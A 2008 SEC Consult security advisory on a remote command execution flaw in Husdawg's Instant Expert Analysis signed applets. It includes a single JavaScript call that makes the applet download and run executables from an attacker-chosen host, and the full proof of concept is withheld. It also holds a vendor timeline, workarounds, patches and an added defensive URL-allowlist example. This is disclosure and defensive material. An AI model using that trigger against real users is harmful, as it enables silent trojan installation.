
Remote command execution in Instant Expert Analysis



SEC Consult SA-20081016-0 :: Remote command execution in Instant Expert Analysis



SEC Consult Security Advisory < 20081016-0 >
=======================================================================
              title: Remote command execution in Instant Expert
                     Analysis signed Java applet and signed ActiveX
                     control
            program: Instant Expert Analysis
             vendor: Husdawg, LLC
             impact: Critical
           homepage: http://www.systemrequirementslab.com
              found: 2008-04-19
                 by: David Matscheko / SEC Consult / www.sec-consult.com
=======================================================================

Vendor description:
-------------------

Instant Expert Analysis is a patent-pending technology that allows
websites to have a one-click method for rapidly analyzing a user's
hardware and software.  The results are then instantaneously compared
to a comprehensive database of requirements.

Instant Expert Analysis has been proven effective by millions of
users on sites run by NVIDIA, Activision, Electronic Arts UK, Eidos,
CNET, IGN, and AMD.

[source: http://www.husdawg.com/systemrequirementslab/Home2.html] 


Vulnerability overview:
-----------------------

Instant Expert Analysis uses a signed Java applet for Firefox or
Netscape browsers and a signed ActiveX plugin for Internet Explorer.
Both applets allow an attacker to download and execute arbitrary
applications when the user visits an infected website.

If the user has already accepted the applet on a valid site, no user
interaction is needed to perform this attack! Because the applets
are signed by a trusted source, the browser's default behavior is to
ask only the first time.


Vulnerability description:
--------------------------

The Init method of sysreqlab2.jar or sysreqlab2.cab can be called
from JavaScript, as in the following example:

  document.SysReqLab.Init("http://www.example.com", "abc");

The applet then downloads and executes a DLL file from
http://www.systemrequirementslab.com.

The DLL file loads a setup_abc.exe, a setup_mz_abc.exe, or a
setup_ie_abc.exe from the location that has been stated in the Init
method (e.g. the attacker's website) and executes it.
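
Added example, not part of the SEC Consult advisory and not Husdawg's
code: the root cause described above is signed code fetching an
executable from a caller-chosen location, and the code below contrasts
that with a fail-closed check. The function names, the single-host
allowlist and the HTTPS requirement are assumptions for illustration.

```javascript
// Added illustration; not code from the advisory or from Husdawg.
// Assumption: installers may only come from this fixed host, over HTTPS.
const ALLOWED_HOSTS = new Set(["www.systemrequirementslab.com"]);
const PREFIXES = ["setup_", "setup_mz_", "setup_ie_"]; // file names from the advisory

// Behaviour the advisory describes: the location passed to Init is trusted
// as-is, so whichever page calls Init decides where the EXE comes from.
function installerUrlsUnchecked(base, id) {
  return PREFIXES.map((p) => `${base}/${p}${id}.exe`);
}

// Hardened form: fail closed unless every component of the request is expected.
function installerUrlsChecked(base, id) {
  let u;
  try {
    u = new URL(base); // WHATWG parser: lowercases host, splits out userinfo
  } catch (e) {
    throw new Error("not an absolute URL");
  }
  if (u.username || u.password) throw new Error("userinfo not allowed");
  if (!ALLOWED_HOSTS.has(u.hostname)) throw new Error("host not allowlisted");
  if (u.protocol !== "https:") throw new Error("scheme not allowed");
  if (u.port !== "") throw new Error("port not allowed");
  if (!/^[A-Za-z0-9]{1,32}$/.test(id)) throw new Error("bad id");
  // Rebuild from validated parts only; the caller's path and query are dropped.
  return PREFIXES.map((p) => `https://${u.hostname}/${p}${id}.exe`);
}

// Returns "ok" or the rejection reason, for logging and tests.
function verdict(base, id) {
  try {
    installerUrlsChecked(base, id);
    return "ok";
  } catch (e) {
    return e.message;
  }
}

// Constructed inputs: the advisory's example call plus look-alike hosts.
const samples = [
  ["http://www.example.com", "abc"],
  ["https://www.systemrequirementslab.com.example.net", "abc"],
  ["https://www.systemrequirementslab.com@example.net", "abc"],
  ["http://www.systemrequirementslab.com", "abc"],
  ["https://www.systemrequirementslab.com", "../abc"],
  ["https://www.systemrequirementslab.com", "abc"],
];
for (const [base, id] of samples) console.log(base, id, "->", verdict(base, id));
```

Exact host matching after parsing is what rejects the suffix and
userinfo look-alikes; a substring or prefix comparison on the raw
string would accept both.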


Proof of concept:
-----------------

The attacker can serve the following files from any host:
  setup_abc.exe
  setup_ie_abc.exe
  setup_mz_abc.exe
  sysreqlab2.cab
  sysreqlab2.jar
  exploit.html

The setup_*.exe files are the trojan applications.

== The full proof of concept has been removed from the public version of
this advisory. ==

Vulnerable versions:
--------------------

No version information could be found for the affected files.


Vendor contact timeline:
------------------------

2008-05-08: Vulnerability information sent to vendor
            (jhussey@husdawg.com)
2008-06-20: We were informed that the main component has been updated,
            and a kill bit process has been initiated with Microsoft.
2008-08-13: Received e-mail from vendor that a case has been opened by
            Microsoft.
2008-10-13: SEC Consult requests an update from Husdawg on how
            the killbit process is going and informs Husdawg that a
            public advisory will be released on October 20th 2008.
2008-10-14: A US-CERT vulnerability note is released, crediting Andre
            Protas of eEye Digital Security and Greg Linares. SEC
            Consult has not been notified in advance of the release and
            has not been credited by the vendor or other parties involved.
            

Workaround:
-----------

Block the ActiveX plugin from "Husdawg, LLC" and don't run it.

Remove the Certificate of the Java applet from "Husdawg, LLC" from
Control Panel / Java / Security / Certificates / Trusted Certificates
and don't allow the applet to run.

Patch:
------

An update is available from the vendor:

http://www.systemrequirementslab.com/bulletins/security_bulletin_1.html 

Additionally, the killbit for the affected ActiveX component has been
set by Microsoft:

http://www.microsoft.com/technet/security/advisory/956391.mspx 


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com 

EOF David Matscheko / @2008

